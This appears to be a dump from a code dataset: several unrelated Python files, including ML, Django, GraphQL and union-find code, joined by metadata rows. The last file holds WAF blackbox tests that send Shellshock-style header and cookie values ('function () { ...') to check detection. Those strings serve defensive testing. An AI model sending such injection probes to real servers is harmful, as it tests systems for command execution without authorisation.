AnalyticAcquisitionFunction,
ConstrainedExpectedImprovement,
ExpectedImprovement,
NoisyExpectedImprovement,
PosteriorMean,
ProbabilityOfImprovement,
UpperConfidenceBound,
)
from .fixed_feature import FixedFeatureAcquisitionFunction
from .monte_carlo import (
MCAcquisitionFunction,
qExpectedImprovement,
qNoisyExpectedImprovement,
qProbabilityOfImprovement,
qSimpleRegret,
qUpperConfidenceBound,
)
from .objective import (
ConstrainedMCObjective,
GenericMCObjective,
IdentityMCObjective,
LinearMCObjective,
MCAcquisitionObjective,
ScalarizedObjective,
)
from .utils import get_acquisition_function
__all__ = [
"AcquisitionFunction",
"AnalyticAcquisitionFunction",
"ConstrainedExpectedImprovement",
"ExpectedImprovement",
"FixedFeatureAcquisitionFunction",
"NoisyExpectedImprovement",
"PosteriorMean",
"ProbabilityOfImprovement",
"UpperConfidenceBound",
"qExpectedImprovement",
"qNoisyExpectedImprovement",
"qProbabilityOfImprovement",
"qSimpleRegret",
"qUpperConfidenceBound",
"ConstrainedMCObjective",
"GenericMCObjective",
"IdentityMCObjective",
"LinearMCObjective",
"MCAcquisitionFunction",
"MCAcquisitionObjective",
"ScalarizedObjective",
"get_acquisition_function",
]
| 25.491525 | 70 | 0.757979 | 83 | 1,504 | 13.614458 | 0.566265 | 0.100885 | 0.134513 | 0.143363 | 0.184071 | 0 | 0 | 0 | 0 | 0 | 0 | 0.000799 | 0.168218 | 1,504 | 58 | 71 | 25.931034 | 0.902478 | 0.05984 | 0 | 0 | 0 | 0 | 0.334986 | 0.209632 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.115385 | 0 | 0.115385 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c72d167470fc1e484c9ed6ee92db56b541a26d0c | 3,216 | py | Python | edivorce/apps/core/views/graphql.py | gerritvdm/eDivorce | e3c0a4037a7141769250b96df6cc4eb4ea5ef3af | [
"Apache-2.0"
] | 6 | 2017-03-24T18:20:33.000Z | 2021-01-29T03:25:07.000Z | edivorce/apps/core/views/graphql.py | gerritvdm/eDivorce | e3c0a4037a7141769250b96df6cc4eb4ea5ef3af | [
"Apache-2.0"
] | 13 | 2018-10-12T17:20:37.000Z | 2021-11-05T23:13:21.000Z | edivorce/apps/core/views/graphql.py | gerritvdm/eDivorce | e3c0a4037a7141769250b96df6cc4eb4ea5ef3af | [
"Apache-2.0"
] | 11 | 2017-03-15T12:36:39.000Z | 2021-03-05T14:35:59.000Z | import graphene
import graphene_django
from django.http import HttpResponseForbidden
from graphene_django.views import GraphQLView
from graphql import GraphQLError
from edivorce.apps.core.models import Document
class PrivateGraphQLView(GraphQLView):
def dispatch(self, request, *args, **kwargs):
if not request.user.is_authenticated:
return HttpResponseForbidden()
return super().dispatch(request, *args, **kwargs)
class DocumentType(graphene_django.DjangoObjectType):
file_url = graphene.String(source='get_file_url')
content_type = graphene.String(source='get_content_type')
class Meta:
model = Document
exclude = ('id', 'file')
class Query(graphene.ObjectType):
documents = graphene.List(DocumentType, doc_type=graphene.String(required=True), party_code=graphene.Int(required=True))
def resolve_documents(self, info, **kwargs):
if info.context.user.is_anonymous:
raise GraphQLError('Unauthorized')
q = Document.objects.filter(bceid_user=info.context.user, **kwargs)
for doc in q:
if not doc.file_exists():
q.delete()
return Document.objects.none()
return q
class DocumentInput(graphene.InputObjectType):
filename = graphene.String(required=True)
size = graphene.Int(required=True)
width = graphene.Int()
height = graphene.Int()
rotation = graphene.Int()
class DocumentMetaDataInput(graphene.InputObjectType):
files = graphene.List(DocumentInput, required=True)
doc_type = graphene.String(required=True)
party_code = graphene.Int(required=True)
class UpdateMetadata(graphene.Mutation):
class Arguments:
input = DocumentMetaDataInput(required=True)
documents = graphene.List(DocumentType)
def mutate(self, info, **kwargs):
input_ = kwargs['input']
documents = Document.objects.filter(bceid_user=info.context.user, doc_type=input_['doc_type'], party_code=input_['party_code'])
unique_files = [dict(s) for s in set(frozenset(d.items()) for d in input_['files'])]
if documents.count() != len(input_['files']) or documents.count() != len(unique_files):
raise GraphQLError("Invalid input: there must be the same number of files")
for i, file in enumerate(input_['files']):
try:
doc = documents.get(filename=file['filename'], size=file['size'])
doc.sort_order = i + 1
doc.width = file.get('width', doc.width)
doc.height = file.get('height', doc.height)
doc.rotation = file.get('rotation', doc.rotation)
if doc.rotation not in [0, 90, 180, 270]:
raise GraphQLError(f"Invalid rotation {doc.rotation}, must be 0, 90, 180, 270")
doc.save()
except Document.DoesNotExist:
raise GraphQLError(f"Couldn't find document '{file['filename']}' with size '{file['size']}'")
return UpdateMetadata(documents=documents.all())
class Mutations(graphene.ObjectType):
update_metadata = UpdateMetadata.Field()
graphql_schema = graphene.Schema(query=Query, mutation=Mutations)
| 36.545455 | 135 | 0.668221 | 370 | 3,216 | 5.716216 | 0.335135 | 0.04539 | 0.025532 | 0.036879 | 0.104019 | 0.104019 | 0.104019 | 0.104019 | 0.061466 | 0.061466 | 0 | 0.007549 | 0.217351 | 3,216 | 87 | 136 | 36.965517 | 0.832737 | 0 | 0 | 0 | 0 | 0 | 0.091418 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.046875 | false | 0 | 0.09375 | 0 | 0.5625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c73caaa0e2719e60ad785aecaaee84cf63518c02 | 1,497 | py | Python | tests/test_path_choice.py | jataware/flee | 67c00c4572e71dd2bbfb390d7d7ede13ffb9594e | [
"BSD-3-Clause"
] | 3 | 2021-05-24T14:07:48.000Z | 2022-01-10T03:20:36.000Z | tests/test_path_choice.py | jataware/flee | 67c00c4572e71dd2bbfb390d7d7ede13ffb9594e | [
"BSD-3-Clause"
] | 15 | 2020-06-05T11:42:23.000Z | 2022-03-09T20:17:29.000Z | tests/test_path_choice.py | jataware/flee | 67c00c4572e71dd2bbfb390d7d7ede13ffb9594e | [
"BSD-3-Clause"
] | 3 | 2020-05-29T15:10:28.000Z | 2022-03-09T19:51:41.000Z | from flee import flee
"""
Generation 1 code. Incorporates only distance, travel always takes one day.
"""
def test_path_choice():
print("Testing basic data handling and simulation kernel.")
flee.SimulationSettings.MinMoveSpeed = 5000.0
flee.SimulationSettings.MaxMoveSpeed = 5000.0
flee.SimulationSettings.MaxWalkSpeed = 5000.0
e = flee.Ecosystem()
l1 = e.addLocation(name="A", movechance=1.0)
_ = e.addLocation(name="B", movechance=1.0)
_ = e.addLocation(name="C1", movechance=1.0)
_ = e.addLocation(name="C2", movechance=1.0)
_ = e.addLocation(name="D1", movechance=1.0)
_ = e.addLocation(name="D2", movechance=1.0)
_ = e.addLocation(name="D3", movechance=1.0)
# l2 = e.addLocation(name="B", movechance=1.0)
# l3 = e.addLocation(name="C1", movechance=1.0)
# l4 = e.addLocation(name="C2", movechance=1.0)
# l5 = e.addLocation(name="D1", movechance=1.0)
# l6 = e.addLocation(name="D2", movechance=1.0)
# l7 = e.addLocation(name="D3", movechance=1.0)
e.linkUp(endpoint1="A", endpoint2="B", distance=10.0)
e.linkUp(endpoint1="A", endpoint2="C1", distance=10.0)
e.linkUp(endpoint1="A", endpoint2="D1", distance=10.0)
e.linkUp(endpoint1="C1", endpoint2="C2", distance=10.0)
e.linkUp(endpoint1="D1", endpoint2="D2", distance=10.0)
e.linkUp(endpoint1="D2", endpoint2="D3", distance=10.0)
e.addAgent(location=l1)
print("Test successful!")
if __name__ == "__main__":
test_path_choice()
| 33.266667 | 75 | 0.663327 | 210 | 1,497 | 4.642857 | 0.285714 | 0.028718 | 0.213333 | 0.093333 | 0.565128 | 0.565128 | 0.443077 | 0.075897 | 0 | 0 | 0 | 0.078025 | 0.160989 | 1,497 | 44 | 76 | 34.022727 | 0.698248 | 0.183033 | 0 | 0 | 0 | 0 | 0.093557 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0 | 0.041667 | 0 | 0.083333 | 0.083333 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c746b2ee9cd86b479c95bc6e51b1c40a08b1d7da | 2,162 | py | Python | algorithms/tests/test_unionfind.py | tommyod/PythonAlgorithms | f0a0f67be069fc9e9fa3027ed83942d6401223fe | [
"MIT"
] | 1 | 2021-08-23T17:15:06.000Z | 2021-08-23T17:15:06.000Z | algorithms/tests/test_unionfind.py | tommyod/PythonAlgorithms | f0a0f67be069fc9e9fa3027ed83942d6401223fe | [
"MIT"
] | 1 | 2018-05-02T17:29:42.000Z | 2018-05-02T17:31:18.000Z | algorithms/tests/test_unionfind.py | tommyod/PythonAlgorithms | f0a0f67be069fc9e9fa3027ed83942d6401223fe | [
"MIT"
] | 1 | 2018-05-02T12:31:52.000Z | 2018-05-02T12:31:52.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Tests for the union find data structure.
"""
try:
from ..unionfind import UnionFind
except ValueError:
pass
def test_unionfind_basics():
"""
Test the basic properties of unionfind.
"""
u = UnionFind([1, 2, 3])
assert u.in_same_set(1, 2) is False
assert u.in_same_set(2, 3) is False
u.union(1, 3)
assert u.in_same_set(1, 2) is False
assert u.in_same_set(3, 1)
assert u.get_root(1) == u.get_root(3)
def test_unionfind_adding_elements():
"""
Test adding operations, mostly syntactic sugar.
"""
u = UnionFind([1, 2])
u.add(['a', 'b'])
assert 1 in u
assert 'a' in u
def test_unionfind_example():
"""
Test on a slightly more invovled example.
"""
u = UnionFind([1, 2, 3, 4, 5])
u.union(1, 3)
u.union(2, 4)
assert u.in_same_set(1, 3)
assert u.in_same_set(4, 2)
assert not u.in_same_set(2, 5)
assert not u.in_same_set(2, 1)
assert not u.in_same_set(1, 4)
u.union(5, 1)
assert u.in_same_set(3, 5)
def test_unionfind_several():
"""
Test that we can take union of more than two elements.
"""
u = UnionFind([1, 2, 3, 4, 5, 6, 7, 8])
u.union([1, 2, 3])
u.union([4, 5, 6])
u.union([7, 8])
assert u.in_same_set(1, 3)
assert u.in_same_set(6, 4)
assert u.in_same_set(7, 8)
assert not u.in_same_set(2, 5)
assert not u.in_same_set(4, 8)
def test_unionfind_compression():
"""
Test path compression and the union by rank.
"""
# Test the ranking
elements = list(range(100))
u = UnionFind(elements)
for i in range(len(elements) - 1):
u.union(elements[i], elements[i + 1])
assert max(u._rank.values()) == 1
# Test path compression
parent_nodes = list(u._parent.values())
assert all(parent == parent_nodes[0] for parent in parent_nodes)
if __name__ == "__main__":
import pytest
# --durations=10 <- May be used to show potentially slow tests
pytest.main(args=['.', '--doctest-modules', '-v']) | 21.62 | 68 | 0.584181 | 345 | 2,162 | 3.498551 | 0.286957 | 0.037283 | 0.086993 | 0.124275 | 0.277548 | 0.264292 | 0.218724 | 0.192212 | 0.192212 | 0.192212 | 0 | 0.04984 | 0.276133 | 2,162 | 100 | 69 | 21.62 | 0.721406 | 0.191952 | 0 | 0.163265 | 0 | 0 | 0.018663 | 0 | 0 | 0 | 0 | 0 | 0.408163 | 1 | 0.102041 | false | 0.020408 | 0.040816 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7477304b232543e959b4e41d7f4db3d8d55814b | 334 | py | Python | products/migrations/0010_remove_product_updated_at.py | UB-ES-2021-A1/wannasell-backend | 84360b2985fc28971867601373697f39303e396b | [
"Unlicense"
] | null | null | null | products/migrations/0010_remove_product_updated_at.py | UB-ES-2021-A1/wannasell-backend | 84360b2985fc28971867601373697f39303e396b | [
"Unlicense"
] | 62 | 2021-11-22T21:52:44.000Z | 2021-12-17T15:07:02.000Z | products/migrations/0010_remove_product_updated_at.py | UB-ES-2021-A1/wannasell-backend | 84360b2985fc28971867601373697f39303e396b | [
"Unlicense"
] | null | null | null | # Generated by Django 3.2.8 on 2021-11-25 17:50
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('products', '0009_auto_20211125_1846'),
]
operations = [
migrations.RemoveField(
model_name='product',
name='updated_at',
),
]
| 18.555556 | 48 | 0.598802 | 36 | 334 | 5.416667 | 0.861111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130802 | 0.290419 | 334 | 17 | 49 | 19.647059 | 0.691983 | 0.134731 | 0 | 0 | 1 | 0 | 0.167247 | 0.080139 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7511256bf0b0f8d7c0f1ccc084e2e9144ad8ab3 | 2,948 | py | Python | sample_architectures/cnn.py | hvarS/PyTorch-Refer | 020445e3ae1f3627f39e1ab957cdff44a2127289 | [
"MIT"
] | null | null | null | sample_architectures/cnn.py | hvarS/PyTorch-Refer | 020445e3ae1f3627f39e1ab957cdff44a2127289 | [
"MIT"
] | null | null | null | sample_architectures/cnn.py | hvarS/PyTorch-Refer | 020445e3ae1f3627f39e1ab957cdff44a2127289 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""CNN.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1Tq6HUya2PrC0SmyOIFo2c_eVtguRED2q
"""
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.utils.data import DataLoader
import torchvision.datasets as datasets
import torchvision.transforms as transforms
class CNN(nn.Module):
def __init__(self,in_channels = 1,num_classes = 10):
super(CNN,self).__init__()
self.conv1 = nn.Conv2d(in_channels= in_channels,out_channels = 8,kernel_size =(3,3),stride = (1,1),padding = (1,1))
self.pool1 = nn.MaxPool2d(kernel_size=(2,2),stride=(2,2))
self.conv2 = nn.Conv2d(in_channels= 8,out_channels = 16,kernel_size =(3,3),stride = (1,1),padding = (1,1))
self.pool2 = nn.MaxPool2d(kernel_size=(2,2),stride=(2,2))
self.fc1 = nn.Linear(16*7*7,num_classes)
def forward(self,x):
x = F.relu(self.conv1(x))
x = self.pool1(x)
x = F.relu(self.conv2(x))
x = self.pool2(x)
x = x.reshape(x.shape[0],-1)
x = self.fc1(x)
return x
model = CNN(1,10)
x = torch.randn((64,1,28,28))
print(model(x).shape)
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
device
in_channels = 1
num_classes = 10
learning_rate = 0.001
batch_size = 64
num_epochs = 4
train_dataset = datasets.MNIST(root = "dataset/",train = True,transform = transforms.ToTensor(),download = True)
train_loader = DataLoader(dataset=train_dataset,batch_size=64,shuffle=True)
test_dataset = train_dataset = datasets.MNIST(root = "dataset/",train = False,transform = transforms.ToTensor(),download = True)
test_loader = DataLoader(dataset = test_dataset,batch_size = batch_size,shuffle = True)
model = CNN(1,10).to(device = device)
criterion = nn.CrossEntropyLoss()
optimizer = optim.Adam(model.parameters(),lr = learning_rate)
for epoch in range(num_epochs):
for batch_idx,(data,targets) in enumerate(train_loader):
#get data to cuda if possible
data = data.cuda()
targets = targets.cuda()
scores = model(data)
loss = criterion(scores,targets)
#backward
optimizer.zero_grad()
loss.backward()
#gradient_descent or adam-step
optimizer.step()
# Check the accuracy for the training step
def check_accuracy(loader,model):
if loader.dataset.train:
print("Checking accuracy on training data")
else:
print("Checking accuracy on test data")
num_correct = 0
num_samples = 0
model.eval()
with torch.no_grad():
for x,y in loader:
x = x.cuda()
y = y.cuda()
scores = model(x)
_,predictions = scores.max(1)
num_correct += (predictions == y).sum()
num_samples += predictions.size(0)
print(f' Got {num_correct}/{num_samples} with accuracy ={float(num_correct)/float(num_samples)*100:.2f} ')
model.train()
check_accuracy(train_loader,model)
check_accuracy(test_loader,model)
| 28.07619 | 128 | 0.700136 | 439 | 2,948 | 4.569476 | 0.328018 | 0.006979 | 0.012961 | 0.013958 | 0.181456 | 0.131605 | 0.108674 | 0.067797 | 0.067797 | 0.067797 | 0 | 0.035251 | 0.162822 | 2,948 | 104 | 129 | 28.346154 | 0.777553 | 0.097693 | 0 | 0 | 1 | 0.014493 | 0.069109 | 0.028323 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.101449 | 0 | 0.173913 | 0.057971 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c75c60f75fce7285b991ad22486e1b1b13a02fed | 1,990 | py | Python | roblox/partials/partialgroup.py | speer-kinjo/ro.py | 2d5b80aec8fd143b11101fbbfdf3b557f798a27f | [
"MIT"
] | 28 | 2021-11-04T11:13:38.000Z | 2022-03-11T05:00:16.000Z | roblox/partials/partialgroup.py | speer-kinjo/ro.py | 2d5b80aec8fd143b11101fbbfdf3b557f798a27f | [
"MIT"
] | 12 | 2021-11-24T06:25:24.000Z | 2022-03-18T14:37:01.000Z | roblox/partials/partialgroup.py | speer-kinjo/ro.py | 2d5b80aec8fd143b11101fbbfdf3b557f798a27f | [
"MIT"
] | 21 | 2021-10-20T16:36:55.000Z | 2022-03-27T21:43:53.000Z | """
This file contains partial objects related to Roblox groups.
"""
from __future__ import annotations
from typing import TYPE_CHECKING
from ..bases.basegroup import BaseGroup
from ..bases.baseuser import BaseUser
if TYPE_CHECKING:
from ..client import Client
class AssetPartialGroup(BaseGroup):
"""
Represents a partial group in the context of a Roblox asset.
Intended to parse the `data[0]["creator"]` data from https://games.roblox.com/v1/games.
Attributes:
_client: The Client object, which is passed to all objects this Client generates.
id: The group's name.
creator: The group's owner.
name: The group's name.
"""
def __init__(self, client: Client, data: dict):
"""
Arguments:
client: The Client.
data: The data from the endpoint.
"""
self._client: Client = client
self.creator: BaseUser = BaseUser(client=client, user_id=data["Id"])
self.id: int = data["CreatorTargetId"]
self.name: str = data["Name"]
super().__init__(client, self.id)
def __repr__(self):
return f"<{self.__class__.__name__} id={self.id} name={self.name!r}>"
class UniversePartialGroup(BaseGroup):
"""
Represents a partial group in the context of a Roblox universe.
Attributes:
_data: The data we get back from the endpoint.
_client: The client object, which is passed to all objects this client generates.
id: Id of the group
name: Name of the group
"""
def __init__(self, client: Client, data: dict):
"""
Arguments:
client: The ClientSharedObject.
data: The data from the endpoint.
"""
self._client: Client = client
self.id = data["id"]
self.name: str = data["name"]
super().__init__(client, self.id)
def __repr__(self):
return f"<{self.__class__.__name__} id={self.id} name={self.name!r}>"
| 28.028169 | 91 | 0.628643 | 251 | 1,990 | 4.776892 | 0.286853 | 0.070058 | 0.053378 | 0.045038 | 0.522102 | 0.522102 | 0.522102 | 0.522102 | 0.522102 | 0.522102 | 0 | 0.001371 | 0.266834 | 1,990 | 70 | 92 | 28.428571 | 0.820425 | 0.411055 | 0 | 0.434783 | 0 | 0.086957 | 0.143564 | 0.051485 | 0 | 0 | 0 | 0 | 0 | 1 | 0.173913 | false | 0 | 0.217391 | 0.086957 | 0.565217 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c75e39b34cd2c6335e68141ae306111fa4b684be | 10,238 | py | Python | tests/blackbox/access_settings/test_bb_access_settings.py | csanders-git/waflz | ec8fc7c845f20a2a8c757d13845ba22a6d7c5b28 | [
"Apache-2.0"
] | 1 | 2019-03-16T09:02:58.000Z | 2019-03-16T09:02:58.000Z | tests/blackbox/access_settings/test_bb_access_settings.py | csanders-git/waflz | ec8fc7c845f20a2a8c757d13845ba22a6d7c5b28 | [
"Apache-2.0"
] | null | null | null | tests/blackbox/access_settings/test_bb_access_settings.py | csanders-git/waflz | ec8fc7c845f20a2a8c757d13845ba22a6d7c5b28 | [
"Apache-2.0"
] | 1 | 2021-04-22T09:43:46.000Z | 2021-04-22T09:43:46.000Z | #!/usr/bin/python
'''Test WAF Access settings'''
#TODO: make so waflz_server only runs once and then can post to it
# ------------------------------------------------------------------------------
# Imports
# ------------------------------------------------------------------------------
import pytest
import subprocess
import os
import sys
import json
from pprint import pprint
import time
import requests
# ------------------------------------------------------------------------------
# Constants
# ------------------------------------------------------------------------------
G_TEST_HOST = 'http://127.0.0.1:12345/'
# ------------------------------------------------------------------------------
# globals
# ------------------------------------------------------------------------------
g_server_pid = -1
# ------------------------------------------------------------------------------
#
# ------------------------------------------------------------------------------
def run_command(command):
p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
return (p.returncode, stdout, stderr)
# ------------------------------------------------------------------------------
#setup_func
# ------------------------------------------------------------------------------
@pytest.fixture()
def setup_func():
global g_server_pid
l_cwd = os.getcwd()
l_file_path = os.path.dirname(os.path.abspath(__file__))
l_ruleset_path = os.path.realpath(os.path.join(l_file_path, '../../data/waf/ruleset'))
l_geoip2city_path = os.path.realpath(os.path.join(l_file_path, '../../data/waf/db/GeoLite2-City.mmdb'));
l_geoip2ISP_path = os.path.realpath(os.path.join(l_file_path, '../../data/waf/db/GeoLite2-ASN.mmdb'));
l_profile_path = os.path.realpath(os.path.join(l_file_path, 'test_bb_access_settings.waf.prof.json'))
l_waflz_server_path = os.path.abspath(os.path.join(l_file_path, '../../../build/util/waflz_server/waflz_server'))
l_subproc = subprocess.Popen([l_waflz_server_path,
'-f', l_profile_path,
'-r', l_ruleset_path,
'-g', l_geoip2city_path,
'-s', l_geoip2ISP_path])
time.sleep(1)
g_server_pid = l_subproc.pid
time.sleep(1)
print 'setup g_server_pid: %d'%(g_server_pid)
time.sleep(1)
# ------------------------------------------------------------------------------
#teardown_func
# ------------------------------------------------------------------------------
def teardown_func():
global g_server_pid
time.sleep(.5)
print 'teardown g_server_pid: %d'%(g_server_pid)
if g_server_pid != -1:
l_code, l_out, l_err = run_command('kill -9 %d'%(g_server_pid))
time.sleep(.5)
# ------------------------------------------------------------------------------
# test_bb_modsecurity_ec_access_settings_ignore_args
# ------------------------------------------------------------------------------
def test_bb_modsec_ec_access_settings_01_block_not_in_ignore_args(setup_func):
#"ignore_query_args": ["ignore", "this", "crap"]
l_uri = G_TEST_HOST + '?' + 'arg1&arg2&arg3&arg4&arg5'
l_headers = {"host": "myhost.com"}
l_r = requests.get(l_uri, headers=l_headers)
assert l_r.status_code == 200
l_r_json = l_r.json()
assert len(l_r_json) > 0
print json.dumps(l_r_json,indent=4)
assert l_r_json['rule_intercept_status'] == 403
#assert 'modsecurity_crs_23_request_limits.conf' in l_r_json['sub_event'][0]['rule_file']
# ensure 403 because exceeded max_num_args
assert 'Too many arguments in' in l_r_json['rule_msg']
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_02_bypass_in_ignore_args
# ------------------------------------------------------------------------------
def test_bb_modsec_ec_access_settings_02_bypass_in_ignore_args():
#Test that passing ignore args lets it bypass
#Max arg limit it 4, we pass 7
l_uri = G_TEST_HOST + '?' + 'arg1&arg2&arg3&arg4&ignore&this&crap'
l_headers = {"host": "myhost.com"}
l_r = requests.get(l_uri, headers=l_headers)
assert l_r.status_code == 200
l_r_json = l_r.json()
assert len(l_r_json) == 0
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_03_block_headers_not_in_ignore_header_list
# ------------------------------------------------------------------------------
def test_bb_modsec_ec_access_settings_03_block_headers_not_in_ignore_header_list():
#ignore_header": ["(?i)(benign-header)", "super-whatever-header", "^D.*"]
l_uri = G_TEST_HOST
l_headers = {"host": "myhost.com",
"kooky-Header" : "function () { doing this is kinda dumb"
}
l_r = requests.get(l_uri, headers=l_headers)
assert l_r.status_code == 200
l_r_json = l_r.json()
print l_r_json
#We got an event
assert len(l_r_json) > 0
# detect a bash shellshock
assert 'Bash shellshock attack detected' in l_r_json['sub_event'][0]['rule_msg']
assert 'REQUEST_HEADERS' in l_r_json['sub_event'][0]['matched_var']['name']
assert 'ZnVuY3Rpb24gKCkgeyBkb2luZyB0aGlzIGlzIGtpbmRhIGR1bWI=' in l_r_json['sub_event'][0]['matched_var']['value']
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_04_bypass_headers_in_ignore_header_list
# ------------------------------------------------------------------------------
def test_bb_modsec_ec_access_settings_04_bypass_headers_in_ignore_header_list():
#Test ignore headers are ignored
l_uri = G_TEST_HOST
l_headers = {"host": "myhost.com",
"Benign-Header" : "function () { doing this is kinda dumb",
"super-whatever-header" : "function () { doing this is kinda dumb"
}
l_r = requests.get(l_uri, headers=l_headers)
assert l_r.status_code == 200
l_r_json = l_r.json()
assert len(l_r_json) == 0
# -------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_05_bypass_headers_in_ignore_header_list_regex
# -------------------------------------------------------------------------------
def test_bb_modsec_ec_access_settings_05_bypass_headers_in_ignore_header_list_regex():
########################################
# Test regex "^D.*"
########################################
l_uri = G_TEST_HOST
#anything that starts with D should be ignored
l_headers = {"host": "myhost.com",
"Doopdoop" : "function () { doing this is kinda dumb",
"Duper-duper-deader" : "function () { doing this is kinda dumb"
}
l_r = requests.get(l_uri, headers=l_headers)
assert l_r.status_code == 200
l_r_json = l_r.json()
assert len(l_r_json) == 0
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_06_block_cookie_not_in_ignore_cookie_list
# ------------------------------------------------------------------------------
def test_bb_modsec_ec_access_settings_06_block_cookie_not_in_ignore_cookie_list():
#"ignore_cookie": ["(?i)(sketchy_origin)", "(?i)(yousocrazy)"]
l_uri = G_TEST_HOST
l_headers = {"host": "myhost.com",
"Cookie": "blahblah=function () { asdf asdf asdf"
}
l_r = requests.get(l_uri, headers=l_headers)
assert l_r.status_code == 200
l_r_json = l_r.json()
assert len(l_r_json) > 0
# detect a bash shellshock
assert 'Bash shellshock attack detected' in l_r_json['sub_event'][0]['rule_msg']
assert 'REQUEST_HEADERS' in l_r_json['sub_event'][0]['matched_var']['name']
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_07_bypass_cookie_in_ignore_cookie_list
# ------------------------------------------------------------------------------
def test_bb_modsec_ec_access_settings_07_bypass_cookie_in_ignore_cookie_list():
#"ignore_cookie": ["(?i)(sketchy_origin)", "(?i)(yousocrazy)"]
l_uri = G_TEST_HOST
l_headers = {"host" : "myhost.com",
"Cookie" : "SkeTchy_Origin=function () { asdf asdf asdf"
}
l_r = requests.get(l_uri, headers=l_headers)
assert l_r.status_code == 200
l_r_json = l_r.json()
#We get no event
assert len(l_r_json) == 0
l_uri = G_TEST_HOST
l_headers = {"host" : "myhost.com",
"Cookie" : "SkeTchy_Origin=function () { asdf asdf asdf"
}
l_r = requests.get(l_uri, headers=l_headers)
assert l_r.status_code == 200
l_r_json = l_r.json()
assert len(l_r_json) == 0
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_08_ignore_cookie_in_ignore_cookie_list
# ------------------------------------------------------------------------------
def test_bb_modsec_ec_access_settings_08_bypass_cookie_in_ignore_cookie_list_regex():
########################################
# Test regex "^[0-9_].*$"
########################################
l_uri = G_TEST_HOST
l_headers = {"host" : "myhost.com",
"Cookie" : "0_123_ADB__bloop=function () { asdf asdf asdf"
}
l_r = requests.get(l_uri, headers=l_headers)
assert l_r.status_code == 200
l_r_json = l_r.json()
assert len(l_r_json) == 0
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_09_block_disallowed_http_method
# ------------------------------------------------------------------------------
def test_bb_modsec_ec_access_settings_09_block_disallowed_http_method():
l_uri = G_TEST_HOST
l_headers = {"host" : "myhost.com"
}
l_r = requests.put(l_uri, headers=l_headers)
assert l_r.status_code == 200
l_r_json = l_r.json()
assert len(l_r_json) > 0
assert 'Method is not allowed by policy' in l_r_json['rule_msg']
teardown_func()
